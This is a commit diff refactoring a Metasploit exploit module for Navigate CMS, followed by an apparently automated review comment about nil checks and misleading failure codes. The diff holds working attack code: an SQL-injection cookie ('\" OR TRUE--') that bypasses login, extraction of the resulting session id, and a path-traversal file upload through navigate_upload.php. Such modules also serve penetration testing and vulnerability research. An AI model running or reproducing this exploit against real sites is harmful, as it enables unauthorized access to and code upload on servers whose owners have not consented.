Refactor again

GSoC/Meterpreter_Web_Console
Pyriphlegethon 2018-09-27 12:38:05 +02:00
parent 82b1f40925
commit 342cfe4199
1 changed files with 21 additions and 16 deletions


@ -51,18 +51,29 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def login_bypass def login_bypass
send_request_cgi( check_resp = send_request_cgi(
'method' => 'POST', 'method' => 'GET',
'cookie' => 'navigate-user=\" OR TRUE--%20',
'uri' => normalize_uri(target_uri.path, '/login.php') 'uri' => normalize_uri(target_uri.path, '/login.php')
) )
login_bypass_resp = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/login.php'),
'cookie' => 'navigate-user=\" OR TRUE--%20'
)
if login_bypass_resp &&
login_bypass_resp.code == 302 &&
check_resp.body.include?('Navigate CMS')
session_id = login_bypass_resp.get_cookies_parsed
.values.select { |v| v.to_s =~ /NVSID_/ }
.first.first
return session_id
end
end end
def check def check
check = login_bypass if login_bypass
if check &&
check.code == 302
return CheckCode::Vulnerable return CheckCode::Vulnerable
end end
@ -70,14 +81,9 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def exploit def exploit
init = login_bypass session_id = login_bypass
fail_with(Failure::Unreachable, 'Unable to reach target') unless init if session_id
session_id = init.get_cookies_parsed
.values.select { |v| v.to_s =~ /NVSID_/ }.first.first
if init.code == 302 && session_id
print_good('Login bypass successful') print_good('Login bypass successful')
else else
fail_with(Failure::NoAccess, 'Login bypass failed') fail_with(Failure::NoAccess, 'Login bypass failed')
@ -91,13 +97,12 @@ class MetasploitModule < Msf::Exploit::Remote
upload = send_request_cgi( upload = send_request_cgi(
'method' => 'POST', 'method' => 'POST',
'cookie' => init.get_cookies, 'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
'vars_get' => Hash[{ 'vars_get' => Hash[{
'session_id' => session_id, 'session_id' => session_id,
'engine' => 'picnik', 'engine' => 'picnik',
'id' => '../../../navigate_info.php' 'id' => '../../../navigate_info.php'
}.to_a.shuffle], }.to_a.shuffle],
'uri' => normalize_uri(target_uri.path, '/navigate_upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}", 'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data_post 'data' => data_post
) )
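Review bot: In the new `login_bypass`, `check_resp` is dereferenced at `check_resp.body.include?('Navigate CMS')` without a nil guard, so a GET that times out raises NoMethodError instead of letting `check` and `exploit` report a clean failure; the condition should begin `if check_resp && login_bypass_resp &&`. The cookie lookup has the same weakness: when no value matches `/NVSID_/`, the first `.first` returns nil and the second raises, which `.find { |v| v.to_s =~ /NVSID_/ }&.first` avoids. The `exploit` hunk also drops the `Failure::Unreachable` branch, so an unreachable host is now reported as `Failure::NoAccess` with 'Login bypass failed', which misleads anyone using the result to confirm whether a host has been patched. `check` now sends the bypass request itself rather than fingerprinting passively, so a short comment above `def check` stating that it is intrusive would be worth adding. The bodies of `check` and `exploit` continue outside the hunks shown, so any later handling there is not visible from here.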